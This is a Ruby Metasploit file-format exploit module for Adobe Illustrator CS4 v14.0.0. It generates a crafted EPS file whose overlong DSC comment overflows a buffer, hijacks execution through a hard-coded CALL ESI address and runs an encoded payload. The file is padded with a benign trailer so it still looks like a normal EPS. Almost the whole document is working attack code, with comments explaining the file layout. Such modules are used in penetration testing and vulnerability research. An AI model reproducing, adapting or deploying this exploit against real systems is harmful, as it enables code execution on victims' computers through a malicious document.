
# Title : Adobe Illustrator CS4 v14.0.0 eps Universal Buffer Overflow (meta)
# Published : 2009-12-07
# Author : dookie


require 'msf/core'

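class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::FILEFORMAT

	# Registers module metadata and the FILENAME option.
	#
	# The single "Windows Universal" target hard-codes a CALL ESI gadget in
	# icudt36.dll (0x4B4B5173). That address is only valid while the DLL is
	# mapped at its preferred base, so the "universal" claim rests on the
	# Illustrator CS4 binaries not being rebased/ASLR'd -- confirm on the
	# target build before relying on it.
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Adobe Illustrator CS4 v14.0.0',
			'Description'    => %q{
					Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)
    overlong DSC Comment Buffer Overflow Exploit 
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'dookie, original by Nine:Situations:Group::pyrokinesis' ],
			'Version'        => '$Revision: 7724 $',
			'References'     =>
				[
					[ 'URL', 'http://www.exploit-db.com/exploits/10281' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					# NUL and the CR/LF/FF whitespace bytes must not appear in the
					# encoded payload: they would terminate the DSC comment line
					# the payload is embedded in (see #exploit). Kept as an
					# upper-alphanumeric encoder so the payload survives as
					# comment text.
					'BadChars' => "\x00\x0D\x0C\x0A",
					'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Windows Universal', { 'Ret' => 0x4B4B5173 } ], # CALL ESI in icudt36.dll
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Dec 03 2009',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME',   [ false, 'The file name.',  '9sg.eps']),
			], self.class)
	end

	# Builds the crafted EPS in memory and writes it out with file_create.
	#
	# File layout:
	#   header  - 32-byte DOS EPS binary header (magic C5 D0 D3 C6, PostScript
	#             section at offset 0x20; the length/TIFF fields are copied
	#             verbatim from the original sample and are NOT recomputed for
	#             the generated size), then the "%!PS-Adobe-3.1 EPSF-3.0" and
	#             DSC-encoding lines, then a lone "%" that opens the overlong
	#             DSC comment which triggers the overflow.
	#   sploit  - 41699 bytes of random alpha filler, the 4-byte little-endian
	#             target return address (presumably the SEH handler slot given
	#             EXITFUNC => 'seh' -- not verifiable from this module), 2291
	#             more bytes of filler, a "%Title:" line, and the encoded
	#             payload on a fresh "%AAAAAAAA" comment line.
	#   trailer - the remaining DSC/Illustrator header comments from a benign
	#             CS4-generated file so the document still looks like an EPS.
	#
	# The module assumes ESI points into the attacker-controlled buffer when
	# the overwritten return fires (hence the CALL ESI gadget); that is not
	# demonstrated here, so re-check it before retargeting.
	def exploit
		header = "\xc5\xd0\xd3\xc6\x20\x00\x00\x00\x05\xc8\x04\x00\x00\x00"
		header << "\x00\x00\x00\x00\x00\x00%\xc8\x04\x00\xb5I\x01\x00\xff"
		header << "\xff\x00\x00"
		header << "%!PS-Adobe-3.1\x20EPSF-3.0\r\n"
		header << "%ADO_DSC_Encoding:\x20Windows\x20Roman\r\n"
		header << "%" # start of the overlong DSC comment

		sploit = rand_text_alpha(41699)  # filler up to the overwritten slot
		sploit << [target.ret].pack('V') # CALL ESI gadget, little-endian DWORD
		sploit << rand_text_alpha(2291)
		sploit << "%Title:\x20Untitled-1.eps\r\n"
		sploit << "%AAAAAAAA"
		sploit << payload.encoded

		# Trailer lines mostly use a bare "\r" terminator, matching the
		# Illustrator-generated sample; only the first two and the last use
		# "\r\n". Kept as-is to match the original file.
		trailer = ": A\r\n"
		trailer << "%%For:\x20alias\r\n"
		trailer << "%%CreationDate:\x2011/27/2009\r\n"
		trailer << "%%BoundingBox:\x200\x200\x20227\x20171\r\n"
		trailer << "%%HiResBoundingBox:\x200\x200\x20226.5044\x20170.3165\r\n"
		trailer << "%%CropBox:\x200\x200\x20226.5044\x20170.3165\r\n"
		trailer << "%%LanguageLevel:\x202\r\n"
		trailer << "%%DocumentData:\x20Clean7Bit\r\n"
		trailer << "%ADOBeginClientInjection:\x20DocumentHeader\x20\"AI11EPS\"\r\n"
		trailer << "%%AI8_CreatorVersion:\x2014.0.0\r"
		trailer << "%AI9_PrintingDataBegin\r"
		trailer << "%ADO_BuildNumber:\x20Adobe\x20Illustrator(R)\x2014.0.0\x20x367\x20R\x20agm\x204.4890\x20ct\x205.1541\r"
		trailer << "%ADO_ContainsXMP:\x20MainFirst\r"
		trailer << "%AI7_Thumbnail:\x20128\x2096\x208\r"
		trailer << "%%BeginData:\x204096\x20Hex\x20Bytes\r"
		trailer << "%0000330000660000990000CC0033000033330033660033990033CC0033FF\r\n"

		eps = header + sploit + trailer

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(eps)
	end

end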